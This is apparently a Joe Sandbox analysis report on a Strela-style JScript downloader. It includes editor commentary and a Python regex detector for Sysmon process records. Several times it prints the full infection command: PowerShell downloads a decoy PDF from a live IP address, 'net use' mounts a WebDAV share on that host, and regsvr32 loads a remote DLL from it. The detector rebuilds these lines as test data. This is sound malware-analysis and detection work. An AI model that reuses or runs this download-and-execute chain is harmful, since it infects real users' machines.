    Source: C:\Windows\System32\net.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\net.exe | Section loaded: webio.dll
    Source: C:\Windows\System32\net.exe | Section loaded: mswsock.dll
    Source: C:\Windows\System32\net.exe | Section loaded: winnsi.dll
    Source: C:\Windows\System32\net.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
    Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

    Data Obfuscation

    Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\Control Panel\International\Locale");IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\Control Panel\International\Locale");IHost.CreateObject("WScript.Shell");IWshShell3.Run("cmd /c powershell.exe -Command "Invoke-WebRequest -OutFile %temp%\invoice.", "0", "false")
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8888
    Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49705
    Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3x)
    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (1x)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (76x)
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX (2x)
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX (6x)
    Note: identical events are collapsed with their counts. NOOPENFILEERRORBOX is SetErrorMode(SEM_NOOPENFILEERRORBOX), which suppresses the "file not found" dialog; the Windows and Adobe processes in this run set it themselves, so on its own it is a weak indicator.

    Malware Analysis System Evasion

    Source: C:\Windows\System32\wscript.exe COM call: HKEY_CURRENT_USER\Control Panel\International\Locale
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (3x)
    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4729
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4968
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412 Thread sleep count: 4729 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5788 Thread sleep count: 4968 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2020 Thread sleep time: -13835058055282155s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5512 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5972 Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4708 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\net.exe TID: 6584 Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\svchost.exe TID: 7408 Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (2x)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (3x)
    Source: net.exe, 00000007.00000002.2124383639.000001C0D4538000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2123251610.000001C0D4599000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.2124471907.000001C0D4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3359612355.0000018F9085B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
    Source: svchost.exe, 00000009.00000002.3358642094.0000018F8B22B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
    Note: identical events are collapsed with their counts. A delay of 922337203685477 ms is Int64.MaxValue / 10000, i.e. an indefinite wait on a handle rather than a measured sleep, and the negative "sleep time" values are the same quantities as NT relative timeouts. The evasion-relevant events that belong to the sample itself are the wscript.exe ones: the Locale read, the WSH-Timer window, and the MachineGuid read at the end of this section. The svchost.exe PhysicalDrive0 open and the "Hyper-V RAW" strings come from Windows components (the latter is the name of the Winsock catalog entry for AF_HYPERV sockets present on Windows 10), not from the script or the chain it spawned.
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\
    (Two further copies of the wscript.exe -> cmd.exe command line, identical apart from letter case, are omitted.)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6x)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (3x)
    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (4x)
    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (3x)
    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation (2x)
    Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information

    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\
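The process-creation lines above (the same ones listed under evasion) are the whole infection chain packed into one cmd.exe command line: Invoke-WebRequest fetches the decoy over plain HTTP from a bare IP into the user's Temp folder, start hands it to the default PDF viewer (Acrobat in this run), net use mounts a WebDAV share, and regsvr32 /s loads a DLL straight from that share. The \\193.143.1.205@8888\davwwwroot\ form is the Windows WebClient (WebDAV Mini-Redirector) UNC syntax: @8888 selects the HTTP port and DavWWWRoot addresses the server root, which is why this report records HTTP on port 8888 and why net.exe memory holds http://193.143.1.205:8888/. No regsvr32.exe process appears in the report's behavior graph, so the DLL load itself was not observed in this run. The detector below is example code added by the editor, not part of the Joe Sandbox report or of the sample. It applies per-process regex rules to constructed Sysmon-style process-creation records that mirror the report's command lines (the PIDs, the explorer.exe parent, the regsvr32.exe record, and the two benign controls are invented for the example) and then groups findings under the nearest wscript.exe or cscript.exe ancestor so the chain is judged as a whole even when its stages run as separate child processes.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# \\host@port\ and \\host@SSL\ are the Windows WebClient (WebDAV Mini-Redirector) UNC
# forms and DavWWWRoot names the server root; this is what net use and regsvr32 receive.
WEBDAV_UNC = re.compile(r"\\\\([A-Za-z0-9.\-]+)@(\d{1,5}|SSL)(?:@\d{1,5})?\\", re.I)
NET_USE_WEBDAV = re.compile(r"\bnet(?:\.exe)?\s+use\s+(?:[A-Za-z]:\s+)?\\\\[^\s\\]+@(?:\d{1,5}|SSL)", re.I)
REGSVR32_UNC = re.compile(r"regsvr32(?:\.exe)?\s+(?:/\w+\s+)*\\\\\S+?\.(?:dll|ocx)\b", re.I)
IWR_TO_TEMP = re.compile(r"invoke-webrequest\b.*?-outf\w*\s+\S*\\temp\\", re.I)  # also -OutF.. prefixes
IP_URL = re.compile(r"""https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(?=[/\s"']|$)""", re.I)
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# All three under one script-host ancestor: the complete mount-and-load chain.
CHAIN_RULES = {"script_host_spawns_shell", "net_use_webdav", "regsvr32_remote_dll"}


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def basename(path: str) -> str:
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def analyse_event(ev: Dict) -> List[Finding]:
    """Stateless rules over one process-creation record (Sysmon EID 1 shape)."""
    out: List[Finding] = []
    pid, cmd = ev["pid"], ev["cmd"]
    image, parent = basename(ev["image"]), basename(ev["parent"])
    if parent in SCRIPT_HOSTS and image in SHELLS:
        out.append(Finding(pid, "script_host_spawns_shell", f"{parent} -> {image}"))
    seen: Set[str] = set()
    for m in WEBDAV_UNC.finditer(cmd):  # one finding per distinct share
        share = m.group(0).rstrip("\\").lower()
        if share not in seen:
            seen.add(share)
            note = " (IP-literal host)" if IPV4.match(m.group(1)) else ""
            out.append(Finding(pid, "webdav_unc_with_port", share + note))
    if NET_USE_WEBDAV.search(cmd):
        out.append(Finding(pid, "net_use_webdav", "net use against \\\\host@port"))
    m = REGSVR32_UNC.search(cmd)
    if m:
        out.append(Finding(pid, "regsvr32_remote_dll", m.group(0)))
    if IWR_TO_TEMP.search(cmd):
        out.append(Finding(pid, "iwr_download_to_temp", "Invoke-WebRequest -OutFile into a Temp path"))
    m = IP_URL.search(cmd)
    if m:
        out.append(Finding(pid, "download_from_ip_literal", m.group(1)))
    return out


def script_host_root(by_pid: Dict[int, Dict], pid: int) -> Optional[int]:
    """Nearest wscript/cscript ancestor of pid (None if the chain has none)."""
    seen: Set[int] = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        if basename(by_pid[pid]["image"]) in SCRIPT_HOSTS:
            return pid
        pid = by_pid[pid]["ppid"]
    return None


def rules_per_script_host(events: List[Dict]) -> Dict[int, Set[str]]:
    """Group findings under their script-host ancestor so a chain that is split
    across several child processes is judged as one unit."""
    by_pid = {e["pid"]: e for e in events}
    grouped: Dict[int, Set[str]] = {}
    for e in events:
        for f in analyse_event(e):
            root = script_host_root(by_pid, f.pid)
            if root is not None:
                grouped.setdefault(root, set()).add(f.rule)
    return grouped


def strela_like_roots(events: List[Dict]) -> List[int]:
    """PIDs of script hosts whose subtree shows the full download/mount/load chain."""
    return sorted(p for p, r in rules_per_script_host(events).items() if CHAIN_RULES <= r)


def ev(pid, ppid, image, parent, cmd):
    return {"pid": pid, "ppid": ppid, "image": image, "parent": parent, "cmd": cmd}


SYS = r"C:\Windows\System32"
PS = SYS + r"\WindowsPowerShell\v1.0\powershell.exe"
DAV = r"\\193.143.1.205@8888\davwwwroot"
TEMP_PDF = r"C:\Users\user\AppData\Local\Temp\invoice.pdf"
IWR = 'powershell.exe -Command "Invoke-WebRequest -OutFile ' + TEMP_PDF + ' http://193.143.1.205/invoice.php"'
# Constructed records: PIDs, the explorer.exe parent, the regsvr32.exe record
# and the two benign controls are invented; command lines mirror the report.
SAMPLE_EVENTS = [
    ev(5000, 1000, SYS + r"\wscript.exe", r"C:\Windows\explorer.exe",
       r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Downloads\1475127682155276.js"'),
    ev(5100, 5000, SYS + r"\cmd.exe", SYS + r"\wscript.exe",
       '"' + SYS + r'\cmd.exe" /c ' + IWR + "&&start " + TEMP_PDF + "&&cmd /c net use " + DAV + "\\"
       + "&&cmd /c regsvr32 /s " + DAV + r"\13188269477300.dll"),
    ev(5200, 5100, PS, SYS + r"\cmd.exe", IWR),
    ev(5300, 5100, r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe", SYS + r"\cmd.exe",
       r'"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "' + TEMP_PDF + '"'),
    ev(5400, 5100, SYS + r"\cmd.exe", SYS + r"\cmd.exe", "cmd /c net use " + DAV + "\\"),
    ev(5500, 5400, SYS + r"\net.exe", SYS + r"\cmd.exe", "net use " + DAV + "\\"),
    ev(5600, 5100, SYS + r"\cmd.exe", SYS + r"\cmd.exe", "cmd /c regsvr32 /s " + DAV + r"\13188269477300.dll"),
    ev(5700, 5600, SYS + r"\regsvr32.exe", SYS + r"\cmd.exe", "regsvr32 /s " + DAV + r"\13188269477300.dll"),
    ev(6000, 1000, PS, r"C:\Windows\explorer.exe",  # benign: named host, Downloads folder
       'powershell.exe -Command "Invoke-WebRequest -OutFile C:\\Users\\user\\Downloads\\report.pdf https://www.example.com/report.pdf"'),
    ev(6100, 1000, SYS + r"\net.exe", r"C:\Windows\explorer.exe", r"net use Z: \\fileserver01\share /persistent:no"),
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        for f in analyse_event(e):
            print(f"pid {f.pid}  {f.rule:<26} {f.detail}")
    print("complete chain under script host PIDs:", strela_like_roots(SAMPLE_EVENTS))
```

Feeding real Sysmon Event ID 1 records only requires mapping ProcessId, ParentProcessId, Image, ParentImage and CommandLine onto the ev() fields. Because every rule is a regex over the command line, the chain is already caught on the cmd.exe record alone, as in this report, where the whole sequence is one command line; the ancestry grouping matters when an operator splits the stages into separately spawned commands.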
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information22
    Scripting
    Valid Accounts1
    Command and Scripting Interpreter
    22
    Scripting
    11
    Process Injection
    11
    Masquerading
    OS Credential Dumping1
    Network Share Discovery
    Remote ServicesData from Local System1
    Data Obfuscation
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Native API
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    131
    Virtualization/Sandbox Evasion
    LSASS Memory11
    Security Software Discovery
    Remote Desktop ProtocolData from Removable Media11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Exploitation for Client Execution
    Logon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive1
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts2
    PowerShell
    Login HookLogin Hook1
    Obfuscated Files or Information
    NTDS131
    Virtualization/Sandbox Evasion
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets1
    Application Window Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync122
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Behavior Graph (ID: 1591624, Sample: 1475127682155276.js, Startdate: 15/01/2025, Architecture: WINDOWS, Score: 100), rendered as a process tree:

    Sample-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Sigma detected: Powershell launch regsvr32; 6 other signatures
    DNS: x1.i.lencr.org

    wscript.exe
        signatures: JScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); 3 other signatures
        cmd.exe
            signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Gathers information about network shares
            powershell.exe
                network: 193.143.1.205 (ports 49704, 49705, 80; ASN BITWEB-ASRU; country unknown)
                dropped: C:\Users\user\AppData\Local\...\invoice.pdf (PDF)
            cmd.exe
                signatures: Gathers information about network shares
                net.exe
            Acrobat.exe
                AcroCEF.exe
                    AcroCEF.exe
            conhost.exe
    svchost.exe
        network: 127.0.0.1

    Antivirus detection (initial sample)
    Source | Detection | Scanner
    1475127682155276.js | 10% | Virustotal
    1475127682155276.js | 8% | ReversingLabs
    No Antivirus matches (dropped files)
    No Antivirus matches (unpacked PE files)
    No Antivirus matches (domains)
    No Antivirus matches (URLs)
    Contacted Domains
    Name | IP | Active | Malicious | Reputation
    bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | high
    x1.i.lencr.org | unknown | unknown | false | high

    Contacted URLs
    Name | Malicious | Reputation
    http://193.143.1.205/invoice.php | false | high

    URLs from Memory and Binaries (URL strings are reproduced as extracted, including truncated ones)
    Name | Source | Malicious | Reputation
    http://193.143.1.205:8888/tem | net.exe, 00000007.00000002.2124383639.000001C0D4538000.00000004.00000020.00020000.00000000.sdmp | false | high
    https://g.live.com/odclientsettings/Prod/C: | edb.log.9.dr, qmgr.db.9.dr | false | high
    http://crl.ver) | svchost.exe, 00000009.00000002.3359525408.0000018F90800000.00000004.00000020.00020000.00000000.sdmp | false | high
    http://x1.i.lencr.org/ | 2D85F72862B55C4EADD9E66E06947F3D0.8.dr | false | high
    https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 00000009.00000003.2123576965.0000018F906F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr | false | high
    http://193.143.1.205:8888/ | net.exe, 00000007.00000003.2123672131.000001C0D456A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.2124471907.000001C0D458F000.00000004.00000020.00020000.00000000.sdmp | false | high
    (The Antivirus Detection column was empty in every row and is omitted. The 193.143.1.205 URLs carry "false" in the Malicious column even though the IP itself is marked malicious in the IP table that follows.)
    Contacted Public IPs
    IP | Domain | Country | ASN | ASN Name | Malicious
    193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true

    Contacted Private IPs
    IP
    127.0.0.1
                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1591624
                      Start date and time:2025-01-15 08:12:10 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 11s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                       Number of new started processes analysed:15
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:1475127682155276.js
                      Detection:MAL
                      Classification:mal100.rans.troj.spyw.expl.evad.winJS@27/55@1/2
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .js
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded IPs from analysis (whitelisted): 184.28.88.176, 34.237.241.83, 54.224.241.105, 50.16.47.176, 18.213.11.84, 172.64.41.3, 162.159.61.3, 184.28.90.27, 199.232.210.172, 23.209.209.135, 2.16.168.125, 2.16.168.107, 2.16.168.105, 13.107.246.45, 4.245.163.56, 23.47.168.24
                      • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                       • Not all processes were analyzed; the report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:13:06 | API Interceptor | 21x Sleep call for process: powershell.exe modified
02:13:10 | API Interceptor | 1x Sleep call for process: net.exe modified
02:13:10 | API Interceptor | 2x Sleep call for process: svchost.exe modified
02:13:22 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
193.143.1.205 | 14957144702878221204.js | malicious | Strela Downloader | 193.143.1.205:8888/
193.143.1.205 | 1579614525244583223.js | malicious | Strela Downloader | 193.143.1.205:8888/
193.143.1.205 | 35491083472324549.js | malicious | Strela Downloader | 193.143.1.205:8888/
193.143.1.205 | 28236151432955330765.js | malicious | Strela Downloader | 193.143.1.205:8888/
